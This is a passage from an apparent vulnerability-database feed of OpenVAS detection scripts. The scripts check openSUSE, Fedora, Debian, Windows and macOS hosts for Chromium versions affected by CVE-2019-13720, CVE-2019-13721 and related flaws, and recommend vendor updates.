script_tag(name:\"insight\", value:\"This update for chromium fixes the following issues:\n\n Chromium was updated to 78.0.3904.87 boo#1155643:\n\n * CVE-2019-13721: Use-after-free in PDFium\n\n * CVE-2019-13720: Use-after-free in audio\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2019-2421=1\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2019-2421=1\");\n\n script_tag(name:\"affected\", value:\"'chromium' package(s) on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver\", rpm:\"chromedriver~78.0.3904.87~lp150.251.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver-debuginfo\", rpm:\"chromedriver-debuginfo~78.0.3904.87~lp150.251.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~78.0.3904.87~lp150.251.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debuginfo\", rpm:\"chromium-debuginfo~78.0.3904.87~lp150.251.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debugsource\", rpm:\"chromium-debugsource~78.0.3904.87~lp150.251.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-29T15:33:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "modified": "2019-11-29T00:00:00", "published": "2019-11-04T00:00:00", "id": "OPENVAS:1361412562310815825", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815825", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop_31-2019-10)-MAC OS X", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815825\");\n script_version(\"2019-11-29T08:04:17+0000\");\n script_cve_id(\"CVE-2019-13721\", \"CVE-2019-13720\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-11-29 08:04:17 +0000 (Fri, 29 Nov 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-11-04 12:00:17 +0530 (Mon, 04 Nov 2019)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop_31-2019-10)-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to\n\n - An use-after-free error in PDFium.\n\n - An use-after-free error in audio.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to execute arbitrary code or cause denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 78.0.3904.87\n on MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 78.0.3904.87 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html\");\n script_xref(name:\"URL\", value:\"https://www.google.com/chrome\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"GoogleChrome/MacOSX/Version\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"78.0.3904.87\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"78.0.3904.87\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-29T15:31:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "modified": "2019-11-29T00:00:00", "published": "2019-11-04T00:00:00", "id": "OPENVAS:1361412562310815823", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815823", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop_31-2019-10)-Windows", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815823\");\n script_version(\"2019-11-29T08:04:17+0000\");\n script_cve_id(\"CVE-2019-13721\", \"CVE-2019-13720\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-11-29 08:04:17 +0000 (Fri, 29 Nov 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-11-04 12:00:17 +0530 (Mon, 04 Nov 2019)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop_31-2019-10)-Windows\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to\n\n - An use-after-free error in PDFium.\n\n - An use-after-free error in audio.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to execute arbitrary code or cause denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 78.0.3904.87\n on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 78.0.3904.87 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html\");\n script_xref(name:\"URL\", value:\"https://www.google.com/chrome\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_win.nasl\");\n script_mandatory_keys(\"GoogleChrome/Win/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"78.0.3904.87\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"78.0.3904.87\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-06T15:44:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5871", "CVE-2019-13659", "CVE-2019-13666", "CVE-2019-13676", "CVE-2019-13677", "CVE-2019-5880", "CVE-2019-13680", "CVE-2019-13664", "CVE-2019-13662", "CVE-2019-13720", "CVE-2019-5877", "CVE-2019-13665", "CVE-2019-13691", "CVE-2019-13674", "CVE-2019-5875", "CVE-2019-13678", "CVE-2019-13679", "CVE-2019-13673", "CVE-2019-13670", "CVE-2019-5876", "CVE-2019-13671", "CVE-2019-13682", "CVE-2019-13669", "CVE-2019-13681", "CVE-2019-5870", "CVE-2019-13660", "CVE-2019-5878", "CVE-2019-13661", "CVE-2019-13721", "CVE-2019-5881", "CVE-2019-5879", "CVE-2019-13692", "CVE-2019-13668", "CVE-2019-13663", "CVE-2019-13683", "CVE-2019-5872", "CVE-2019-13675", "CVE-2019-5874", "CVE-2019-13667"], "description": "The remote host is missing an update for the ", "modified": "2019-12-06T00:00:00", "published": "2019-11-17T00:00:00", "id": "OPENVAS:1361412562310877007", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310877007", "type": "openvas", "title": "Fedora Update for chromium FEDORA-2019-8508d74523", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.877007\");\n script_version(\"2019-12-06T10:04:22+0000\");\n script_cve_id(\"CVE-2019-13720\", \"CVE-2019-13721\", \"CVE-2019-5870\", \"CVE-2019-5871\", \"CVE-2019-5872\", \"CVE-2019-5874\", \"CVE-2019-5875\", \"CVE-2019-13691\", \"CVE-2019-13692\", \"CVE-2019-5876\", \"CVE-2019-5877\", \"CVE-2019-5878\", \"CVE-2019-5879\", \"CVE-2019-5880\", \"CVE-2019-5881\", \"CVE-2019-13659\", \"CVE-2019-13660\", \"CVE-2019-13661\", \"CVE-2019-13662\", \"CVE-2019-13663\", \"CVE-2019-13664\", \"CVE-2019-13665\", \"CVE-2019-13666\", \"CVE-2019-13667\", \"CVE-2019-13668\", \"CVE-2019-13669\", \"CVE-2019-13670\", \"CVE-2019-13671\", \"CVE-2019-13673\", \"CVE-2019-13674\", \"CVE-2019-13675\", \"CVE-2019-13676\", \"CVE-2019-13677\", \"CVE-2019-13678\", \"CVE-2019-13679\", \"CVE-2019-13680\", \"CVE-2019-13681\", \"CVE-2019-13682\", \"CVE-2019-13683\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-12-06 10:04:22 +0000 (Fri, 06 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-11-17 03:31:03 +0000 (Sun, 17 Nov 2019)\");\n script_name(\"Fedora Update for chromium FEDORA-2019-8508d74523\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2019-8508d74523\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/E4PBGVMZ355Z7XR6CLI4W42NBIXY3JHS\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chromium'\n package(s) announced via the FEDORA-2019-8508d74523 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Chromium is an open-source web browser, powered by WebKit (Blink).\");\n\n script_tag(name:\"affected\", value:\"'chromium' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~78.0.3904.87~1.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-06T15:41:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5871", "CVE-2019-13659", "CVE-2019-13666", "CVE-2019-13676", "CVE-2019-13677", "CVE-2019-5880", "CVE-2019-13680", "CVE-2019-13664", "CVE-2019-13662", "CVE-2019-13720", "CVE-2019-5877", "CVE-2019-13665", "CVE-2019-13691", "CVE-2019-13674", "CVE-2019-5875", "CVE-2019-13678", "CVE-2019-13679", "CVE-2019-13673", "CVE-2019-13670", "CVE-2019-5876", "CVE-2019-13671", "CVE-2019-13682", "CVE-2019-13669", "CVE-2019-13681", "CVE-2019-5870", "CVE-2019-13660", "CVE-2019-5878", "CVE-2019-13661", "CVE-2019-13721", "CVE-2019-5881", "CVE-2019-5879", "CVE-2019-13692", "CVE-2019-13668", "CVE-2019-13663", "CVE-2019-13683", "CVE-2019-5872", "CVE-2019-13675", "CVE-2019-5874", "CVE-2019-13667"], "description": "The remote host is missing an update for the ", "modified": "2019-12-06T00:00:00", "published": "2019-11-17T00:00:00", "id": "OPENVAS:1361412562310877015", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310877015", "type": "openvas", "title": "Fedora Update for chromium FEDORA-2019-2fa7552273", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.877015\");\n script_version(\"2019-12-06T10:04:22+0000\");\n script_cve_id(\"CVE-2019-13720\", \"CVE-2019-13721\", \"CVE-2019-5870\", \"CVE-2019-5871\", \"CVE-2019-5872\", \"CVE-2019-5874\", \"CVE-2019-5875\", \"CVE-2019-13691\", \"CVE-2019-13692\", \"CVE-2019-5876\", \"CVE-2019-5877\", \"CVE-2019-5878\", \"CVE-2019-5879\", \"CVE-2019-5880\", \"CVE-2019-5881\", \"CVE-2019-13659\", \"CVE-2019-13660\", \"CVE-2019-13661\", \"CVE-2019-13662\", \"CVE-2019-13663\", \"CVE-2019-13664\", \"CVE-2019-13665\", \"CVE-2019-13666\", \"CVE-2019-13667\", \"CVE-2019-13668\", \"CVE-2019-13669\", \"CVE-2019-13670\", \"CVE-2019-13671\", \"CVE-2019-13673\", \"CVE-2019-13674\", \"CVE-2019-13675\", \"CVE-2019-13676\", \"CVE-2019-13677\", \"CVE-2019-13678\", \"CVE-2019-13679\", \"CVE-2019-13680\", \"CVE-2019-13681\", \"CVE-2019-13682\", \"CVE-2019-13683\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-12-06 10:04:22 +0000 (Fri, 06 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-11-17 03:32:23 +0000 (Sun, 17 Nov 2019)\");\n script_name(\"Fedora Update for chromium FEDORA-2019-2fa7552273\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC30\");\n\n script_xref(name:\"FEDORA\", value:\"2019-2fa7552273\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZTDUMER334IGKQEKTUQHRW5PUGM6YINZ\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chromium'\n package(s) announced via the FEDORA-2019-2fa7552273 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Chromium is an open-source web browser, powered by WebKit (Blink).\");\n\n script_tag(name:\"affected\", value:\"'chromium' package(s) on Fedora 30.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC30\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~78.0.3904.87~1.fc30\", rls:\"FC30\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-09T15:52:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-13704", "CVE-2019-5871", "CVE-2019-13714", "CVE-2019-13659", "CVE-2019-13666", "CVE-2019-13687", "CVE-2019-13676", "CVE-2019-13677", "CVE-2019-5869", "CVE-2019-13686", "CVE-2019-5880", "CVE-2019-13680", "CVE-2019-13664", "CVE-2019-13699", "CVE-2019-13662", "CVE-2019-13720", "CVE-2019-5877", "CVE-2019-13719", "CVE-2019-13665", "CVE-2019-13691", "CVE-2019-13674", "CVE-2019-13706", "CVE-2019-5875", "CVE-2019-13678", "CVE-2019-13694", "CVE-2019-13718", "CVE-2019-13701", "CVE-2019-13679", "CVE-2019-13702", "CVE-2019-13673", "CVE-2019-13670", "CVE-2019-13713", "CVE-2019-13700", "CVE-2019-5876", "CVE-2019-13671", "CVE-2019-13682", "CVE-2019-13707", "CVE-2019-13669", "CVE-2019-13681", "CVE-2019-13685", "CVE-2019-13695", "CVE-2019-5870", "CVE-2019-13717", "CVE-2019-13660", "CVE-2019-5878", "CVE-2019-13709", "CVE-2019-13661", "CVE-2019-13721", "CVE-2019-5879", "CVE-2019-13696", "CVE-2019-13703", "CVE-2019-13693", "CVE-2019-13692", "CVE-2019-13668", "CVE-2019-13663", "CVE-2019-13715", "CVE-2019-13683", "CVE-2019-5872", "CVE-2019-13697", "CVE-2019-13708", "CVE-2019-13705", "CVE-2019-13675", "CVE-2019-13710", "CVE-2019-5874", "CVE-2019-13667", "CVE-2019-13688", "CVE-2019-13711", "CVE-2019-13716"], "description": "The remote host is missing an update for the ", "modified": "2019-12-06T00:00:00", "published": "2019-11-12T00:00:00", "id": "OPENVAS:1361412562310704562", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704562", "type": "openvas", "title": "Debian Security Advisory DSA 4562-1 (chromium - security update)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704562\");\n script_version(\"2019-12-06T10:04:22+0000\");\n script_cve_id(\"CVE-2019-13659\", \"CVE-2019-13660\", \"CVE-2019-13661\", \"CVE-2019-13662\", \"CVE-2019-13663\", \"CVE-2019-13664\", \"CVE-2019-13665\", \"CVE-2019-13666\", \"CVE-2019-13667\", \"CVE-2019-13668\", \"CVE-2019-13669\", \"CVE-2019-13670\", \"CVE-2019-13671\", \"CVE-2019-13673\", \"CVE-2019-13674\", \"CVE-2019-13675\", \"CVE-2019-13676\", \"CVE-2019-13677\", \"CVE-2019-13678\", \"CVE-2019-13679\", \"CVE-2019-13680\", \"CVE-2019-13681\", \"CVE-2019-13682\", \"CVE-2019-13683\", \"CVE-2019-13685\", \"CVE-2019-13686\", \"CVE-2019-13687\", \"CVE-2019-13688\", \"CVE-2019-13691\", \"CVE-2019-13692\", \"CVE-2019-13693\", \"CVE-2019-13694\", \"CVE-2019-13695\", \"CVE-2019-13696\", \"CVE-2019-13697\", \"CVE-2019-13699\", \"CVE-2019-13700\", \"CVE-2019-13701\", \"CVE-2019-13702\", \"CVE-2019-13703\", \"CVE-2019-13704\", \"CVE-2019-13705\", \"CVE-2019-13706\", \"CVE-2019-13707\", \"CVE-2019-13708\", \"CVE-2019-13709\", \"CVE-2019-13710\", \"CVE-2019-13711\", \"CVE-2019-13713\", \"CVE-2019-13714\", \"CVE-2019-13715\", \"CVE-2019-13716\", \"CVE-2019-13717\", \"CVE-2019-13718\", \"CVE-2019-13719\", \"CVE-2019-13720\", \"CVE-2019-13721\", \"CVE-2019-5869\", \"CVE-2019-5870\", \"CVE-2019-5871\", \"CVE-2019-5872\", \"CVE-2019-5874\", \"CVE-2019-5875\", \"CVE-2019-5876\", \"CVE-2019-5877\", \"CVE-2019-5878\", \"CVE-2019-5879\", \"CVE-2019-5880\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-12-06 10:04:22 +0000 (Fri, 06 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-11-12 03:00:49 +0000 (Tue, 12 Nov 2019)\");\n script_name(\"Debian Security Advisory DSA 4562-1 (chromium - security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB10\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2019/dsa-4562.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DSA-4562-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chromium'\n package(s) announced via the DSA-4562-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Several vulnerabilities have been discovered in the chromium web browser.\n\nCVE-2019-5869\nZhe Jin discovered a use-after-free issue.\n\nCVE-2019-5870\nGuang Gong discovered a use-after-free issue.\n\nCVE-2019-5871\nA buffer overflow issue was discovered in the skia library.\n\nCVE-2019-5872\nZhe Jin discovered a use-after-free issue.\n\nCVE-2019-5874\nJames Lee discovered an issue with external Uniform Resource Identifiers.\n\nCVE-2019-5875\nKhalil Zhani discovered a URL spoofing issue.\n\nCVE-2019-5876\nMan Yue Mo discovered a use-after-free issue.\n\nCVE-2019-5877\nGuang Gong discovered an out-of-bounds read issue.\n\nCVE-2019-5878\nGuang Gong discovered an use-after-free issue in the v8 javascript\nlibrary.\n\nCVE-2019-5879\nJinseo Kim discover that extensions could read files on the local\nsystem.\n\nCVE-2019-5880\nJun Kokatsu discovered a way to bypass the SameSite cookie feature.\n\nCVE-2019-13659\nLnyas Zhang discovered a URL spoofing issue.\n\nCVE-2019-13660\nWenxu Wu discovered a user interface error in full screen mode.\n\nCVE-2019-13661\nWenxu Wu discovered a user interface spoofing issue in full screen mode.\n\nCVE-2019-13662\nDavid Erceg discovered a way to bypass the Content Security Policy.\n\nCVE-2019-13663\nLnyas Zhang discovered a way to spoof Internationalized Domain Names.\n\nCVE-2019-13664\nThomas Shadwell discovered a way to bypass the SameSite cookie feature.\n\nCVE-2019-13665\nJun Kokatsu discovered a way to bypass the multiple file download\nprotection feature.\n\nCVE-2019-13666\nTom Van Goethem discovered an information leak.\n\nCVE-2019-13667\nKhalil Zhani discovered a URL spoofing issue.\n\nCVE-2019-13668\nDavid Erceg discovered an information leak.\n\nCVE-2019-13669\nKhalil Zhani discovered an authentication spoofing issue.\n\nCVE-2019-13670\nGuang Gong discovered a memory corruption issue in the v8 javascript\nlibrary.\n\nCVE-2019-13671\nxisigr discovered a user interface error.\n\nCVE-2019-13673\nDavid Erceg discovered an information leak.\n\nCVE-2019-13674\nKhalil Zhani discovered a way to spoof Internationalized Domain Names.\n\nCVE-2019-13675\nJun Kokatsu discovered a way to disable extensions.\n\nCVE-2019-13676\nWenxu Wu discovered an error in a certificate warning.\n\nCVE-2019-13677\nJun Kokatsu discovered an error in the chrome web store.\n\nCVE-2019-13678\nRonni Skansing discovered a spoofing issue in the download dialog window.\n\nCVE-2019-13679\nConrad Irwin discovered that user activation was not required for\nprinting.\n\nCVE-2019-13680\nThijs Alkamade discovered an IP address spoofing issue.\n\nCVE-2019-13681\nDavid Erceg discovered a way to bypass download restrictions.\n\nCVE-2019-13682\nJun Kokatsu discovered a way to bypass the site iso ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'chromium' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For the oldstable distribution (stretch), support for chromium has been\ndiscontinued. Please upgrade to the stable release (buster) to continue\nreceiving chromium updates or switch to firefox, which continues to be\nsupported in the oldstable release.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 78.0.3904.97-1~deb10u1.\n\nWe recommend that you upgrade your chromium packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"chromium\", ver:\"78.0.3904.97-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"chromium-common\", ver:\"78.0.3904.97-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"chromium-driver\", 